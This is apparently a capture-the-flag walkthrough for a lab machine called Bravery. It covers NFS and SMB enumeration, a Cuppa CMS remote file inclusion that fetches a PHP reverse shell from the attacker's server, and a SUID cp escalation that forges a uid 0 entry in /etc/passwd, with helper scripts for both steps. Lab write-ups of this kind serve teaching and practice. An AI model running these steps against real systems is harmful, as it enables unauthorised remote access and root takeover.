
Bravery


# Mount the NFS export (/var/nfsshare) found during enumeration and look through it
mkdir nfs
sudo mount -t nfs 192.168.43.175:/var/nfsshare nfs


Candidate password string found in the share:

qwertyuioplkjhgfdsazxcvbnm

SMB

enum4linux 192.168.43.175


smbclient --no-pass //192.168.43.175/anonymous


The anonymous share allows a null-session connection, but there is nothing of value in it.

The secured share refuses anonymous access, so use -U to try the usernames already collected together with the string found earlier that looks like a password.

smbclient //192.168.43.175/secured -U david


Browse the files in the share one by one.


Cuppa CMS


It has many published vulnerabilities. Pick the simplest one: the remote file inclusion.


Grab a PHP reverse shell and rename it with a .txt extension, so the attacker's web server hands back the PHP source instead of executing it; the target's include() then runs it.

http://192.168.1.112/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.108:8080/php-reverse-shell.txt
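The staging step above, as an added example that is not part of the original writeup: stage_shell rewrites the two `$ip`/`$port` lines of a pentestmonkey-style reverse shell to the listener address and writes the result under a .txt name, and rfi_url builds the alertConfigField.php URL from the page. The embedded template is a constructed stand-in for php-reverse-shell.php, and the listener host/port and the python3/nc commands in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example (not from the original writeup): stage a PHP reverse shell so
# the Cuppa CMS RFI can fetch it.  The attacker-side HTTP server must return
# the PHP source as plain text, which is why the file is served as .txt.

# stage_shell TEMPLATE OUT LHOST LPORT
# Copies TEMPLATE to OUT, rewriting the two lines
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# to the listener address.  Everything else is left untouched.
stage_shell() {
    tmpl=$1; out=$2; lhost=$3; lport=$4
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$lhost';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = $lport;/" "$tmpl" > "$out"
}

# rfi_url BASE LHOST LPORT FILE -> the URL that makes the target include our file.
# BASE is the cuppaCMS directory on the target (taken from the page's URL).
rfi_url() {
    printf '%s/alerts/alertConfigField.php?urlConfig=http://%s:%s/%s\n' "$1" "$2" "$3" "$4"
}

# Constructed stand-in for php-reverse-shell.php: only the lines that matter.
SAMPLE_TEMPLATE="<?php
set_time_limit (0);
\$ip = '127.0.0.1';  // CHANGE THIS
\$port = 1234;       // CHANGE THIS
// ... connect back to \$ip:\$port and spawn /bin/sh ...
?>"

# Typical run (attacker host/port are placeholders):
#   stage_shell php-reverse-shell.php php-reverse-shell.txt 192.168.1.108 4444
#   python3 -m http.server 8080 &    # serves the .txt as-is, no PHP handler
#   nc -lvnp 4444 &                  # catches the connect-back
#   curl "$(rfi_url http://192.168.1.112/genevieve/cuppaCMS 192.168.1.108 8080 php-reverse-shell.txt)"
```

Check the HTTP server's access log for a GET of the .txt before blaming the listener: if the target never fetched the file, the include URL or allow_url_include is the problem, not the shell.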


Basic post-exploitation enumeration shows that cp has the SUID bit set.


First copy /etc/passwd to the attack box and duplicate root's entry as the last line.


Use openssl to generate a password hash for the new user evil.


In the duplicated line, replace the username field with evil and the password field (the x) with the hash, keeping uid and gid 0.


Upload the edited file to the writable /tmp directory on the target.


Use the SUID cp to overwrite /etc/passwd with it.


su evil
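The whole passwd-forging procedure above, as an added example that is not part of the original writeup: root_entry builds the uid 0 line with an openssl md5crypt hash, forge_passwd appends it to a copy of the original file, and check_passwd verifies the result still parses (seven fields per line, exactly one entry for the new user) before it is copied over /etc/passwd. The embedded passwd file is a constructed sample; the user name, password, salt and the /tmp paths in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example (not from the original writeup): build the replacement
# /etc/passwd used in the SUID-cp escalation.  A crypt hash in the second
# field makes su/login check it directly instead of consulting /etc/shadow,
# so a uid 0 entry with a known password is enough.

# root_entry USER PASSWORD SALT -> "USER:HASH:0:0:USER:/root:/bin/bash"
# openssl passwd -1 produces an md5crypt hash, which every libcrypt accepts;
# -6 (sha512crypt) works too on modern targets.  A fixed salt keeps the
# output reproducible.
root_entry() {
    hash=$(openssl passwd -1 -salt "$3" "$2") || return 1
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$1" "$hash" "$1"
}

# forge_passwd ORIGINAL OUT USER PASSWORD SALT
# Copies ORIGINAL to OUT and appends the new uid 0 entry as the last line.
forge_passwd() {
    cp "$1" "$2" && root_entry "$3" "$4" "$5" >> "$2"
}

# check_passwd FILE USER -> 0 if every line has the 7 colon-separated fields
# that su/login expect and exactly one entry named USER has uid 0.
# A malformed line here can lock everyone out, so run this before the cp.
check_passwd() {
    awk -F: -v u="$2" '
        NF != 7 { bad = 1 }
        $1 == u && $3 == 0 { n++ }
        END { exit (bad || n != 1) }
    ' "$1"
}

# Constructed stand-in for the target's /etc/passwd.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
david:x:1000:1000::/home/david:/bin/bash'

# Typical use (paths and credentials are placeholders):
#   forge_passwd passwd.orig passwd.new evil evil abcdefgh   # on the attack box
#   check_passwd passwd.new evil && echo ok
#   # upload passwd.new to /tmp/passwd on the target, then as the low-priv user:
#   cp /etc/passwd /tmp/passwd.bak    # keep a way back
#   cp /tmp/passwd /etc/passwd        # SUID cp writes the file as root
#   su evil
```

Because the new line is appended rather than replacing root's entry, root's own login is untouched; if something goes wrong, /tmp/passwd.bak can be copied back with the same SUID cp.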
